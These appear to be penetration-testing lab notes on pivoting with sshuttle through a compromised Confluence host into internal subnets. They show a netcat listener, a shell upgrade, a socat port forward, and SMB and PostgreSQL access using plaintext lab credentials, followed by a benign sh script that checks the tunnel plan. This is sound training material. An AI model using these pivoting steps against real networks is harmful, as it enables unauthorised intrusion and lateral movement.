Sshuttle
sshuttle is a tool that creates a VPN-like tunnel over SSH. It transparently routes traffic destined for the specified subnets through an SSH connection, so client tools need no proxy configuration. It needs root privileges (via sudo) on the client (attacker) machine, because it installs firewall redirect rules, and Python 3 on the SSH server (pivot host).
It is particularly useful when classic dynamic port forwarding (ssh -D plus proxychains) becomes cumbersome to manage.
Tunnelling scenario recap:
We have a reverse shell on CONFLUENCE01 (192.168.125.63) via CVE-2022-26134. From CONFLUENCE01 we can SSH to PGDATABASE01 (10.4.125.215). Our goal is to access the following internal networks: 10.4.125.0/24 and 172.16.125.0/24.
We can set up a port forward on CONFLUENCE01 with socat, forwarding local port 2222 to PGDATABASE01:22. This exposes PGDATABASE01's SSH service on CONFLUENCE01:2222, where Kali can reach it directly.

$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22

Then we can use sshuttle from Kali to route the desired subnets through the forwarded SSH connection. -r takes the SSH connection string (user@pivot_host:port), followed by the list of subnets to route.
$ sshuttle -r database_admin@192.168.125.63:2222 10.4.125.0/24 172.16.125.0/24
...
database_admin@192.168.125.63's password: #sqlpass123
client_input_hostkeys: hostkeys_foreach failed for /home/x7331/.ssh/known_hosts: Permission denied
c : Connected to server.

The known_hosts warning is non-fatal in this run; the tunnel is up once sshuttle prints "c : Connected to server." We can now test the pivoted access by connecting to an internal service (e.g., SMB on HRSHARES, 172.16.125.217) without any additional port forwards or proxychains.
$ smbclient -L //172.16.125.217/ -U hr_admin --password=Welcome1234

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Scripts         Disk
        Users           Disk
The same works for PostgreSQL on PGDATABASE01, reached directly on 10.4.125.215:5432 through the 10.4.125.0/24 route:

$ psql -h 10.4.125.215 -p 5432 -U postgres
Password for user postgres: # D@t4basePassw0rd!
...
postgres=#
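As an added example (not part of the original notes or of sshuttle itself), the POSIX sh script below sanity-checks a planned sshuttle invocation before running it. It confirms that every internal target is covered by one of the routed subnets and that the pivot host itself is not, since sshuttle must not pull its own SSH session to the pivot into the tunnel it carries. The pivot string and subnets are the lab values from the notes; the list of targets to check is an assumption.

```shell
#!/bin/sh
# Added example: plan an sshuttle run and check it before launching.
# Lab values (pivot string, subnets, target hosts) come from the notes above;
# the idea of listing "targets" to verify is an assumption of this script.

# ip_to_int 10.4.125.215 -> 168066519 (dotted quad to 32-bit integer)
ip_to_int() {
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_subnet IP CIDR -> exit status 0 if IP falls inside CIDR
in_subnet() {
    net=${2%/*}; bits=${2#*/}
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    [ $(( $(ip_to_int "$1") & mask )) -eq $(( $(ip_to_int "$net") & mask )) ]
}

# covered IP SUBNET... -> exit status 0 if any subnet contains IP
covered() {
    ip=$1; shift
    for s in "$@"; do
        in_subnet "$ip" "$s" && return 0
    done
    return 1
}

# pivot_host user@host:port -> host
pivot_host() {
    h=${1#*@}
    echo "${h%%:*}"
}

# check_plan user@host:port "target1 target2 ..." SUBNET...
# Prints the sshuttle command line if the plan is sane, returns 1 otherwise.
check_plan() {
    r=$1; targets=$2; shift 2
    host=$(pivot_host "$r")
    if covered "$host" "$@"; then
        # The SSH connection to the pivot would itself be redirected into
        # the tunnel; sshuttle's -x option can carve the host back out.
        echo "pivot $host lies inside a routed subnet; add -x $host/32" >&2
        return 1
    fi
    for t in $targets; do
        covered "$t" "$@" || {
            echo "target $t is not covered by any routed subnet" >&2
            return 1
        }
    done
    echo "sshuttle -r $r $*"
}

# Usage with the lab values: HRSHARES and PGDATABASE01 are the targets.
check_plan database_admin@192.168.125.63:2222 \
    "172.16.125.217 10.4.125.215" \
    10.4.125.0/24 172.16.125.0/24
```

Run it before the real sshuttle command; if the pivot's own address ever ends up inside a routed subnet (for example when routing a /16 that also contains the pivot), sshuttle's `-x` option excludes that host from the redirect. The `--dns` option additionally pushes DNS queries through the tunnel, which is handy once hostnames such as HRSHARES need to resolve from Kali.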